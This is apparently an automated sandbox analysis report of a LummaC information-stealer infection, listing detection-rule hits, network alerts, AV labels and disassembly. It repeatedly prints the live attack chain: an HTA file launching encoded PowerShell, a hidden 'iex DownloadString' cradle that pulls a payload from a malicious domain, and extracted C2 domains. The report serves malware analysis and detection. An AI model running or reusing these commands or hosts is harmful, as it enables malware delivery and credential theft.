CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\title.mp4.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6880, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ProcessId: 744, ProcessName: powershell.exe
                          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , ProcessId: 4628, ProcessName: powershell.exe
                          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , ProcessId: 4628, ProcessName: powershell.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\title.mp4.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6880, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ProcessId: 744, ProcessName: powershell.exe
                          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <style> body { font-family: system-ui; font-weight: 300; font-size: 1.25rem; color: #36393a; display: flex; align-items: center; justify-content: center; } main { max-width: 1200px; margin-top: 120px; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.25rem; } svg { margin-left: 2rem; } @keyframes eye-1 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(-5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } @keyframes eye-2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-size: 3.75rem; font-weight: 400; margin-bottom: 0.5rem; } h3 { font-size: 2rem; font-weight: 400; color: #92979b; margin: 0; } a { color: #0055dc; } p { margin: 0; } #error-title { font-size: 2rem; margin-bottom: 1rem; } #footer-title { font-weight: 700; margin-bottom: 0.75rem; } </style> </head> <body> <main> <section id="text"> <div> <h1>Error 404</h1> <h3>Object not found</h3> </div> <div> <p> This object does not exist or is not publicly accessible at this URL. Check the URL of the object that you're looking for or contact the owner to enable Public access. </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 414 212" fill="none" xmlns="http://www.w3.org/2000/svg" > <ellipse cx="208.5" cy="166.5" rx="174.5" ry="45.5" fill="#E2F5FA" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" fill="#C5EBF5" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z"

                          Data Obfuscation

                          barindex
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , ProcessId: 4628, ProcessName: powershell.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-06T13:56:30.938062+010020283713Unknown Traffic192.168.2.449953104.21.43.229443TCP
                          2025-01-06T13:56:31.864224+010020283713Unknown Traffic192.168.2.449960104.21.43.229443TCP
                          2025-01-06T13:56:33.013742+010020283713Unknown Traffic192.168.2.449966104.21.43.229443TCP
                          2025-01-06T13:56:34.204186+010020283713Unknown Traffic192.168.2.449977104.21.43.229443TCP
                          2025-01-06T13:56:35.188871+010020283713Unknown Traffic192.168.2.449983104.21.43.229443TCP
                          2025-01-06T13:56:37.285044+010020283713Unknown Traffic192.168.2.449998104.21.43.229443TCP
                          2025-01-06T13:56:40.665653+010020283713Unknown Traffic192.168.2.450014104.21.43.229443TCP
                          2025-01-06T13:56:41.878622+010020283713Unknown Traffic192.168.2.450015104.21.43.229443TCP
                          2025-01-06T13:56:43.941915+010020283713Unknown Traffic192.168.2.450016104.21.43.229443TCP
                          2025-01-06T13:56:44.936488+010020283713Unknown Traffic192.168.2.450017172.67.208.58443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-06T13:56:31.375737+010020546531A Network Trojan was detected192.168.2.449953104.21.43.229443TCP
                          2025-01-06T13:56:32.346808+010020546531A Network Trojan was detected192.168.2.449960104.21.43.229443TCP
                          2025-01-06T13:56:44.440999+010020546531A Network Trojan was detected192.168.2.450016104.21.43.229443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-06T13:56:31.375737+010020498361A Network Trojan was detected192.168.2.449953104.21.43.229443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-06T13:56:32.346808+010020498121A Network Trojan was detected192.168.2.449960104.21.43.229443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-06T13:56:33.695995+010020480941Malware Command and Control Activity Detected192.168.2.449966104.21.43.229443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-06T13:56:41.885677+010028438641A Network Trojan was detected192.168.2.450015104.21.43.229443TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: https://klipvumisui.shop/MAvira URL Cloud: Label: malware
                          Source: https://klipvumisui.shop/int_clp_ldr_sha.txtQAvira URL Cloud: Label: malware
                          Source: https://klipvumisui.shop/=Avira URL Cloud: Label: malware
                          Source: https://klipvumisui.shop/int_clp_ldr_sha.txtAvira URL Cloud: Label: malware
                          Source: 10.2.powershell.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "noisycuttej.shop", "quantitypitt.click", "rabidcowse.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop", "nearycrepso.shop"], "Build id": "yJaNLj--re4"}
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: quantitypitt.click
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                          Source: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yJaNLj--re4
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00416C8D CryptUnprotectData,10_2_00416C8D
                          Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49953 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49960 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49966 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49977 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49983 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49998 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:50014 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:50015 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:50016 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:50017 version: TLS 1.2
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07665C4Eh5_2_0766597A
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 0767A762h5_2_0767A4B6
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 0767A762h5_2_0767A3E0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 0767A762h5_2_0767A3D1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07677EAEh5_2_07677E48
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07677EAEh5_2_07677E39
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx10_2_00443B2E
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax+17064887h]10_2_0040DB30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esi]10_2_00426DD0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0000019Ch]10_2_00409E40
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2AAF123Ah]10_2_00429E10
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], AF52E86Bh10_2_00429E10
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea edi, dword ptr [edx+ecx]10_2_00429E10
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add edx, ecx10_2_00429E10
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edx], bl10_2_0040E6CA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edx], bl10_2_0040E6CA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_00442F93
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, ebx10_2_0041E860
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push ebx10_2_0040A813
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h10_2_00416029
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_00409880
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+14B53331h]10_2_00441880
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then not eax10_2_00417170
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+0000014Ch]10_2_00432172
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_0042D9C0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_0041D1A9
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_0043BAD0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al10_2_0041C2DF
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-2Ch]10_2_0041C2DF
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h10_2_0040E2B7
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, word ptr [eax]10_2_00445360
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]10_2_00408BC0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx10_2_0041E3D2
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebp+00h], ax10_2_0041E3D2
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]10_2_00420BE0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx10_2_0041E3ED
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebp+00h], ax10_2_0041E3ED
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 6A911B6Ch10_2_004173EC
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp al, 2Eh10_2_0042A3FA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl10_2_0042FBFA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h10_2_00441BB0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h10_2_00422C40
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, ecx10_2_00422C40
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_0040E468
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-66h]10_2_0041840D
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, eax10_2_00441C20
